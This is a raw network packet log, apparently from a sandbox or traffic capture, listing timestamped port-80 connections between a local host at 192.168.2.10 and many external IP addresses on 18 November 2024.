                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.854932070 CET5000680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.855055094 CET5000680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.855091095 CET5000680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.859941959 CET805000644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.859952927 CET805000644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.516431093 CET805000644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.516715050 CET5000680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.522327900 CET805000644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.522393942 CET5000680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.546256065 CET805000554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.546510935 CET5000580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.551918983 CET805000554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.553435087 CET5000580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.560456038 CET5000780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.565522909 CET805000744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.567862988 CET5000780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.568231106 CET5000780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.568249941 CET5000780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.573138952 CET805000744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.573198080 CET805000744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.885443926 CET5000880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.890497923 CET805000818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.890682936 CET5000880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.891002893 CET5000880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.891002893 CET5000880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.895879030 CET805000818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.895891905 CET805000818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.228943110 CET805000744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.229188919 CET5000780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.234589100 CET805000744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.234683037 CET5000780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.243334055 CET5000980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.248336077 CET8050009172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.248482943 CET5000980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.248648882 CET5000980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.248648882 CET5000980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.253561974 CET8050009172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.253580093 CET8050009172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.912935972 CET8050009172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.913611889 CET5000980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.923628092 CET5000980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.928699017 CET8050009172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.941530943 CET5001080192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.946819067 CET8050010172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.947340965 CET5001080192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.947443962 CET5001080192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.947443962 CET5001080192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.952426910 CET8050010172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.952444077 CET8050010172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.349637985 CET805000818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.395973921 CET5000880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.454737902 CET5000880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.460166931 CET805000818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.460306883 CET5000880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.616298914 CET8050010172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.616364002 CET5001080192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.616837978 CET5001080192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.619605064 CET5001180192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.622751951 CET8050010172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.624447107 CET8050011172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.624579906 CET5001180192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.626451015 CET5001180192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.626451015 CET5001180192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.631289005 CET8050011172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.631300926 CET8050011172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.636801958 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.641685963 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.641757965 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.642258883 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.642258883 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.647083998 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.647097111 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.284796000 CET8050011172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.284877062 CET5001180192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.309187889 CET5001180192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.314860106 CET8050011172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.416609049 CET5001380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.421664000 CET8050013172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.421912909 CET5001380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.427056074 CET5001380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.427088022 CET5001380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.431977987 CET8050013172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.431992054 CET8050013172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.088553905 CET8050013172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.088629007 CET5001380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.099942923 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.112360954 CET5001380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.113128901 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.117191076 CET8050013172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.118247032 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.118310928 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.158860922 CET5001480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.163723946 CET805001482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.164679050 CET5001480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.164906979 CET5001480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.164906979 CET5001480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.169795990 CET805001482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.169852018 CET805001482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.413620949 CET5001580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.418719053 CET805001534.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.418823957 CET5001580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.422775030 CET5001580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.422915936 CET5001580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.427849054 CET805001534.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.427877903 CET805001534.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.393579960 CET805001534.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.397393942 CET5001580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.402709007 CET805001534.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.402849913 CET5001580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.531903028 CET5001680192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.536803961 CET805001618.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.537111044 CET5001680192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.537419081 CET5001680192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.537493944 CET5001680192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.542217970 CET805001618.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.542243958 CET805001618.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.188848972 CET805001618.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.189230919 CET5001680192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.194700956 CET805001618.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.194766045 CET5001680192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.355232000 CET5001780192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.360282898 CET8050017208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.360532045 CET5001780192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.360749006 CET5001780192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.360749960 CET5001780192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.365597963 CET8050017208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.365614891 CET8050017208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.347691059 CET8050017208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.418250084 CET5001780192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.561934948 CET5001780192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.561934948 CET5001780192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.567101955 CET8050017208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.567114115 CET8050017208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.706814051 CET8050017208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.761851072 CET5001780192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.954036951 CET5001880192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.959184885 CET805001813.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.959270954 CET5001880192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.962547064 CET5001880192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.962547064 CET5001880192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.967569113 CET805001813.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.967582941 CET805001813.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.383431911 CET805001813.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.383615971 CET5001880192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.389070988 CET805001813.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.390893936 CET5001880192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.553767920 CET5001980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.558680058 CET805001944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.558767080 CET5001980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.559196949 CET5001980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.559218884 CET5001980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.564064980 CET805001944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.564076900 CET805001944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.225547075 CET805001944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.225727081 CET5001980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.230952978 CET805001944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.231010914 CET5001980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.371788979 CET5002080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.376601934 CET805002054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.376682997 CET5002080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.376916885 CET5002080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.376940966 CET5002080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.381705999 CET805002054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.381731033 CET805002054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.218960047 CET805002054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.261897087 CET5002080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.338356972 CET805002054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.338505983 CET5002080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.340743065 CET5002080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.346499920 CET805002054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.611943960 CET5002180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.616898060 CET805002135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.617036104 CET5002180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.617110014 CET5002180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.617110014 CET5002180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.621973991 CET805002135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.621987104 CET805002135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.446959019 CET805002135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.447228909 CET5002180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.452858925 CET805002135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.453042030 CET5002180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.624962091 CET5002280192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.629770994 CET80500223.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.629848957 CET5002280192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.630033970 CET5002280192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.630162954 CET5002280192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.634815931 CET80500223.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.634890079 CET80500223.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.646817923 CET805001482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.649291039 CET5001480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.649350882 CET5001480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.651752949 CET5002380192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.654099941 CET805001482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.657380104 CET805002382.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.657495975 CET5002380192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.657711983 CET5002380192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.657756090 CET5002380192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.662511110 CET805002382.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.662559032 CET805002382.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.303308010 CET80500223.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.303554058 CET5002280192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.308675051 CET80500223.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.308931112 CET5002280192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.487644911 CET5002480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.492522955 CET8050024165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.492619038 CET5002480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.512111902 CET5002480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.516048908 CET5002480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.516974926 CET8050024165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.521002054 CET8050024165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.282036066 CET8050024165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.336641073 CET5002480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.336719990 CET5002480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.341598988 CET8050024165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.341640949 CET8050024165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.558386087 CET8050024165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.669688940 CET5002580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.674597979 CET805002554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.674660921 CET5002580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.674824953 CET5002580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.674865961 CET5002580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.679678917 CET805002554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.679688931 CET805002554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.699352980 CET5002480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:33.512067080 CET805002554.244.188.177192.168.2.10
